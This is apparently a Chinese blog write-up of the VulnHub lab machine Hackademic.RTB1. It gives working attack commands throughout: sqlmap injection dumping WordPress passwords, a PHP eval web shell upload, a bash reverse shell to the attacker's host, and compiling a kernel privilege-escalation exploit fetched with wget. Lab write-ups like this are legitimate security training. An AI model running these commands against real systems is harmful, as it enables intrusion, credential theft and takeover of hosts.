vulnhub - Hackademic.RTB1

vulnhub - Hackademic.RTB1

基本信息收集

nmap 192.168.157.0/24
nmap -sT --min-rate 10000 -p- 192.168.157.178

image-20240918215648708

识别到是WordPress,直接上wpscan

wpscan --url http://192.168.157.178/ -e at -e ap -eu

image-20240919101921624

得到用户:NickJames

SQL注入

有超链接的地方点点发现参数如下

http://192.168.157.178/Hackademic_RTB1/?p=9
http://192.168.157.178/Hackademic_RTB1/?cat=1

测试sql注入

image-20240919103026318

搜索框输入后参数变为 http://192.168.157.178/Hackademic_RTB1/index.php?s=-1,输入-1'会被转义为-1\\\'

点击月份发现参数为?m=201101

用sqlmap轮番测试

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent --dbs

image-20240919104001605

cat参数存在注入点,走常规流程

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" --tables --batch

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" --columns --batch

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" -C "user_nicename,user_pass" --dump --batch

image-20240919104557135

jognsmith的密码也可以查到:PUPPIES

image-20240919104644134

nickjames admin
maxbucky kernel
georgemiller q1w2e3
jasonkonnors maxwell
tonyblack napoleon
johnsmith PUPPIES

找一下后台地址

dirsearch -u http://192.168.157.178/Hackademic_RTB1/

image-20240919105250253

结果都登不上,考虑是用户名大小写问题

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" -C "user_login,user_nickname" --dump --batch

image-20240919105852308

NickJames admin
MaxBucky kernel
GeorgeMiller q1w2e3
JasonKonnors maxwell
TonyBlack napoleon
JohnSmith PUPPIES

文件上传

登入测试后发现GeorgeMiller权限最高,寻找利用点

image-20240919122657501

此处可以文件上传,先测试下<?php phpinfo(); ?>

image-20240919122816975

一句话木马连接蚁剑<?php eval($_POST[cmd]); ?>

image-20240919123210987

反弹shell

蚁剑终端

bash -i >& /dev/tcp/192.168.157.161/9999 0>&1

image-20240919123853649

没有权限,查看内核版本

bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

提权

尝试内核提权

searchsploit Linux Kernel 2.6.3 | grep "Local Privilege Escalation"

尝试后发现 15285.c 可用

image-20240919144044005

复制到/tmp目录

cp /usr/share/exploitdb/exploits/linux/local/15285.c /tmp

kali开启服务

python3 -m http.server 80

靶机上下载

wget http://192.168.157.161/15285.c

image-20240919145040922

编译后运行

gcc -o exp 15285.c
chmod +x exp
./exp

image-20240919145200124

拿到key.txt

image-20240919145331216

总结

一台适合盲打的机器

posted @   Mar10  阅读(16)  评论(0编辑  收藏  举报
相关博文:
· vulnhub - hackme1
· vulnhub - LAMPSECURITY: CTF5
· Vulnhub Hackademic:RTB1
· Vulnhub之Hackademic.RTB
· 打靶笔记-02-vulnhub-Hackademic.RTB1
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示